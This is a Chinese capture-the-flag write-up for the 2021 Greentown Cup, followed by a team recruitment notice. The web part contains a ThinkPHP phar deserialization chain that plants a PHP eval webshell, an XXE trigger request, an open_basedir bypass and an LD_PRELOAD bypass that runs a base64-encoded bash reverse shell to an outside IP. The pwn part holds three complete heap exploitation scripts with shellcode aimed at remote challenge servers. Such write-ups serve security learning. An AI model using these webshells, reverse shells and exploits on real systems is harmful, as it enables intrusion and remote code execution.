2021 绿城杯 wp

Web

ezcms

ciscn华东北分区赛awd的链⼦

<?php
namespace think\cache\driver {
 class File
 {
 protected $options=null;
 protected $tag;
 function __construct(){
 $this->options=[
 'expire' => 3600,
 'cache_subdir' => false,
 'prefix' => '',
 'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-
decode/resource=aaaPD9waHAgQGV2YWwoJF9SRVFVRVNUWydzdWFudmUnXSk7Pz4g/../uploads/user/4/allimg/20
210929/a.php',
 'data_compress' => false,
 ];
 $this->tag = 'suanve';
 }
 }
}
namespace think\session\driver{
 class SessionHandler{}
 class Memcached extends SessionHandler{
 protected $handler;
 protected $config = [];
 function __construct()
{
 $this->config['session_name'] = 123;
 $this->config['expire'] = 123;
$this->handler = new \think\cache\driver\File();
 }
 }
}
namespace think\console{
 class Output{
 protected $styles;
 private $handle;
 function __construct()
{
 $this->styles = array('readAndWrite');
 $this->handle = new \think\session\driver\Memcached();
 }
 }
}
namespace think {
 class Process
 {
 private $processInformation;
 private $status;
 private $process;
 private $processPipes;
 function __construct()
{
 $this->status = 'started';
 $this->processInformation= array("running"=>true);
 $this->processPipes = new console\Output();
 $this->process = 1;
 }
 }
}
namespace {
 use think\Process;
 // echo base64_encode(serialize(new Process()));
 @unlink("phar.phar");
 $phar = new Phar("phar.phar"); //后缀名必须为phar
 $phar->startBuffering();
 $phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
 $o = new Process();
 $phar->setMetadata($o); //将⾃定义的meta-data存⼊manifest
 $phar->addFromString("test.txt", "test"); //添加要压缩的⽂件
 //签名⾃动计算
 $phar->stopBuffering();
 copy("./phar.phar","/Users/su/1.gif");
}

⽣成phar⽂件 eyoucms不校验ico后缀的⽂件 所以改名为ico⽂件即可上传，xxe触发phar 通过gitee发现了⼀个xxe的修复 应该可以利⽤。

POST /index.php/home/Index/_initialize HTTP/1.1
Host: 0666787d-4b66-4e6e-8d13-55ab438b085f.zzctf.dasctf.com
Content-Type: text/xml; charset=utf-8
Cache-Control: max-age=0
Content-Length: 265
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-
encode/resource=phar:///var/www/html/uploads/user/4/allimg/20210929/4-210929141155239.ico" >]>
<root>
<name>&xxe;</name>
</root>

拿到shell发现限制

绕过openbasedir

然后使⽤dl绕过disable_function 反弹shell

<?php
ini_set('open_basedir',dirname(__FILE__));
mkdir('tmp');
chdir('tmp');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');
echo "fuck runing";
$cmd = '/readflag';
$cmd = "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMTk2LjE2NS4xMTUvOTAxIDA+JjE=|base64 -d |bash";
$out_path = "/tmp/xxx";
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = "/tmp/exp.so";
putenv("LD_PRELOAD=" . $so_path);
mb_send_mail("", "", "");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; 
//var_dump(file_get_contents("/"));

使⽤PATH提权

ezphp

githack获取源码

FLAG DASCTF{ca9efc658d3d96d7f2ccc81733bb4830}

Misc

[warmup]⾳频隐写

使⽤audacity打开题⽬，转换成频谱图，拉到最后即可看到flag。

Re

easyre

32位exe⽂件，打开之后是魔改的rc4

直接写脚本不好做，可以⽤爆破来爆破每⼀位，python的os库可以调⽤exe

import os
b=['Hello, this is my world.If you want flag, give me something I like.\n', '\n', '\n', '\n',
"sorry!I don't like your stuff."]
flag=""
c=""
for i in range(50):
 for j in range(32,127):
 flag=c
 flag+=chr(j)
 with open("tt.txt", "w") as f:
 f.write(flag)
 os.system("easy_re.exe <tt.txt> flag.txt")
 with open("flag.txt", "r") as a:
 data = a.readlines()
 #print(data)
 if(data!=b):
 print(chr(j))
 c+=chr(j)
 break

FLAG flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}

Crypto

RSA1

[warmup]加密算法

加密算法是读到字⺟的下标，然后按照 (下标*a+b)%m 的计算⽅式，计算出新的下标，来表示新的字符串。只需要 写⼀个逆操作就好。

from Crypto.Util.number import *
cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def decode(plain_text, a, b, m):
 flag = ''
 for j in plain_text:
 for i in range(len(str1)):
 if (i*a+b) % m == str1.find(j):
 flag += str1[i]
 if j not in str1:
 flag += j
 print(flag)
decode(cipher_text,37,23,52)
# flag{AffInE_CIpheR_iS_clAssiC}

Pwn

null_pwn

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./null_pwn'
#context.arch='amd64'
while True :
 # try :
 elf=ELF(elfelf)
 context.arch=elf.arch
 gdb_text='''
 telescope $rebase(0x202040) 16
 '''
if len(sys.argv)==1 :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=process(elfelf)
 # io=process(['./'],env={'LD_PRELOAD':'./'})
 clibc.srand(clibc.time(0))
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 else :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=remote('82.157.5.28',51704)
 clibc.srand(clibc.time(0))
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 def choice(a):
 io.sendlineafter('Your choice :',str(a))
 def add(a,c,b):
 choice(1)
 io.sendlineafter('Index:',str(a))
 io.sendlineafter('Size of Heap : ',str(c))
 io.sendafter('Content?:',b)
 
 def edit(a,b):
 choice(3)
 io.sendlineafter('Index:',str(a))
 io.sendafter('Content?:',b)
 def show(a):
 choice(4)
 io.sendlineafter('Index :',str(a))
 def delete(a):
 choice(2)
 io.sendlineafter('Index:',str(a))
 add(0,0x88,'a')
 add(1,0x68,'a')
 add(2,0x68,'a')
 add(3,0x88,'a')
 add(4,0xf0,'a')
 add(5,0xf0,'a')
 delete(0)
 show(0)
 edit(3,'\x00'*0x80+p64(0x200)+'\x00')
 delete(4)
 delete(1)
 add(0,0xc8,'a'*8)
show(0)
 libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-840-0x10
 libc.address=libc_base
 bin_sh_addr=libc.search('/bin/sh\x00').next()
 system_addr=libc.sym['system']
 free_hook_addr=libc.sym['__free_hook']
 edit(0,'\x00'*0x88+p64(0x71)+p64(libc.sym['__malloc_hook']-0x23)+'\n')
 add(1,0x68,'a')
 add(3,0x68,'a')
 edit(3,'\x00'*0x13+p64(libc_base+one_gadgaet[2])+'\n')
 edit(0,'\x00'*0x88+p64(0x1000)+p64(libc.sym['__malloc_hook']-0x23)+'\n')
 delete(1)
 success('libc_base:'+hex(libc_base))
 # success('heap_base:'+hex(heap_base))
 # gdb.attach(io,gdb_text)
 io.interactive()
 # except Exception as e:
 # io.close()
 # continue
 # else:
 # continue

uaf

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./uaf_pwn'
#context.arch='amd64'
while True :
 # try :
 elf=ELF(elfelf)
 context.arch=elf.arch
 gdb_text='''
 telescope $rebase(0x202040) 16
 '''
 if len(sys.argv)==1 :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
io=process(elfelf)
 # io=process(['./'],env={'LD_PRELOAD':'./'})
 clibc.srand(clibc.time(0))
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 else :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=remote('82.157.5.28',50202)
 clibc.srand(clibc.time(0))
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 def choice(a):
 io.sendlineafter('>',str(a))
 def add(c):
 choice(1)
 io.sendafter('size>',str(c))
 
 def edit(a,b):
 choice(3)
 io.sendlineafter('index>',str(a))
 io.sendafter('content>',b)
 def show(a):
 choice(4)
 io.sendlineafter('index>',str(a))
 def delete(a):
 choice(2)
 io.sendlineafter('index>',str(a))
 io.recvuntil('0x')
 heap_addr=int(io.recv(12),16)
 add(0x88)
 add(0x68)
 add(0x68)
 delete(0)
 show(0)
 libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-88-0x10
 libc.address=libc_base
 bin_sh_addr=libc.search('/bin/sh\x00').next()
 system_addr=libc.sym['system']
 free_hook_addr=libc.sym['__free_hook']
 delete(1)
 edit(1,p64(libc.sym['__malloc_hook']-0x23))
add(0x68)
 add(0x68)
 edit(4,'\x00'*0x13+p64(one_gadgaet[2]+libc_base))
 delete(1)
 delete(1)
 success('libc_base:'+hex(libc_base))
 # success('heap_base:'+hex(heap_base))
 # gdb.attach(io,gdb_text)
 io.interactive()
 # except Exception as e:
 # io.close()
 # continue
 # else:
 # continue

GreentownNote

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./GreentownNote'
#context.arch='amd64'
while True :
 # try :
 elf=ELF(elfelf)
 context.arch=elf.arch
 gdb_text='''
 telescope $rebase(0x202040) 16
 '''
if len(sys.argv)==1 :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=process(elfelf)
 # io=process(['./'],env={'LD_PRELOAD':'./'})
 clibc.srand(clibc.time(0))
 libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 else :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=remote('82.157.5.28',51701)
 clibc.srand(clibc.time(0))
 libc=ELF('./libc-2.27.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 def choice(a):
 io.sendlineafter('Your choice :',str(a))
 def add(b,c):
 choice(1)
 io.sendlineafter(':',str(b))
 io.sendafter(':',str(c))
 def show(a):
 choice(2)
 io.sendlineafter(':',str(a))
 def delete(a):
 choice(3)
 io.sendlineafter(':',str(a))
 add(0x88,'a')
 add(0x88,'a')
 for i in range(7):
 delete(1)
 delete(0)
 show(0)
 libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-0x10
 libc.address=libc_base
 bin_sh_addr=libc.search('/bin/sh\x00').next()
 system_addr=libc.sym['system']
 free_hook_addr=libc.sym['__free_hook']
 add(0x88,p64(free_hook_addr))
 add(0x88,p64(free_hook_addr))
 new_shell_code_head_addr=free_hook_addr&0xfffffffffffff000
shell1='''
 xor rdi,rdi
 mov rsi,%d
 mov rdx,0x1000
 xor rax,rax
 syscall
 jmp rsi
 '''%new_shell_code_head_addr
 pay=p64(libc.sym['setcontext']+53)+p64(free_hook_addr+0x10)+asm(shell1)
 add(0x88,pay)
 srop_mprotect=SigreturnFrame()
 srop_mprotect.rsp=free_hook_addr+0x8
 srop_mprotect.rdi=new_shell_code_head_addr
 srop_mprotect.rsi=0x1000
 srop_mprotect.rdx=4|2|1
 srop_mprotect.rip=libc.sym['mprotect']
 add(0x200,str(srop_mprotect))
 # gdb.attach(io,gdb_text)
 delete(3)
 shell2='''
 mov rax,0x67616c662f2e
 push rax
 mov rdi,rsp
 mov rsi,0x0
 xor rdx,rdx
 mov rax,0x2
 syscall
 mov rdi,rax
 mov rsi,rsp
 mov rdx,0x100
 mov rax,0x0
 syscall
 mov rdi,0x1
 mov rsi,rsp
 mov rdx,0x100
 mov rax,0x1
 syscall
 '''
 io.sendline(asm(shell2))
 
 # success('libc_base:'+hex(libc_base))
 # success('heap_base:'+hex(heap_base))
 
 # gdb.attach(io,gdb_text)
 io.interactive()
 # except Exception as e:
# io.close()
 # continue
 # else:
 # continue

Tip

你是否想加入一个安全团

拥有更好的学习住宅？

那就加入EDI安全，一起来不是，但师傅们明白，可以让你从基础开始，只要你有恒努力的决心

EDI安全的CTF战队经常参与CTF比赛，了解CTF赛事，在为打造安全圈好的技术我们自己而努力，这里绝对是你学习的好技术。 ，可以让你一起从基础开始，只要你有持之以恒努力的决心，下一个CTF大牛就是你。

欢迎大佬小白入驻，大家一起打CTF，一起进步。

我们在，不让你埋没！

你的加入可以给我们带来新的活力，我们同样也可以给予你无限的发展空间。

有意向的师傅请联系邮箱root@edisec.net带上自己的简历，简历内容包括自己的学习、学习方向等